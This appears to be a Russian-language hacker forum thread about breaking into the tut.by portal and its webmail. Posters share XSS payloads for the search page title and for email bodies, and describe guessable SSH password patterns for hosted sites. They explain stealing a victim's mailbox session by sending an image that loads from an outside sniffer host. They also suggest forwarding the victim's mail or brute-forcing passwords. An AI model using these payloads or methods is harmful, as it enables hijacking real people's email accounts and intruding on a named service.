Все сайты, которые они хостят, лежат вмесе с их мыльницей на одном серве. ЗЫ для каждого хостящегося есть ssh. Пассы на ssh обычно: логин - низвание сайта без домена, а пароль комбинация 9 чисел и букв. Там дохрена сайтов с ipb и phpbb помойму до сих пор валяется.
Хм.. Умнее... Ищи xss. Есть пасивная в поле поискового запроса, прямо на главной, там в теге title ничего не фильтруется. xss выглядит так: Code: </title><script>alert('Antichat (c)!')</script> Может пригодиться..
Взлом tut.by Ну чтож.. На редкость дырявый портал. За 20 минут было обнаружено несколько активных xss в теле письма. Вот пример: Code: <style type="text/css">@import url(javascript:alert('Antichat have it!'));</style> Работает в IE. Поскольку для аутентификации куки не используются, то взлом упрощается до нельзя. Всего навсего требуется сессия. Отправляешь жертве такую тему: Code: Привет, как дела? <img src="http://antichat.ru/cgi-bin/s.jpg"> и подписываешься на снифер. ВСЁ! Ящик твой. Палева - 0, эффективность - 100%, жаль пароля не будет) Очень рекомендую использовать при этом программу XSS Tester от LittleLamer. Можно скачать с этой странички. Если прибавишь мне репутацию, то я не обижусь.
Только осталось... Так говоришь, как будто это делают единицы) По мне так, пускай лучше меня взламает неизвестный мне тип, чем сосед по локалке, который отснифал пасс по POP3... Портал вообще безбашенный в плане безопасности.. Куда смотрят...
А если отснифовать куки с почтовика-то нельзя будет полностью забрать этот ящик себе? Т.е. сменить пароль?
А я присылаю себе картинку от снифера, но не вижу себя в логах. Уже на нескольких почтах делал. Что-то изменили?
Нет, полностью забрать его себе не удастся, только полный доступ к ящику на время сессии. Если ты что-либо хочешь сотворить с ящиком, в т.ч. сменить пароль, но у тебя запрашивают старый пароль, то ничего тебе не светит... Пароль никаким печеньем не заменишь. В подобных случаях советую пользоваться альтернативными методами, как то настройка пересылки с ящика жертвы на ваш... ну и подобные трюки. Всё что описано выше актуально исключительно для tut.by на момент написания, я проверял лично. Сейчас не знаю.
Какие люди ленивые пошли... Зайди на аккаунт tut.by, потом представь что ты забыл нахер пароль и тебе край нужно его поменять... Найдешь способ сделать это - значит сменить пасс реально. Если нет, то остается только брут/угадывание/чтение мыслей хозяина...
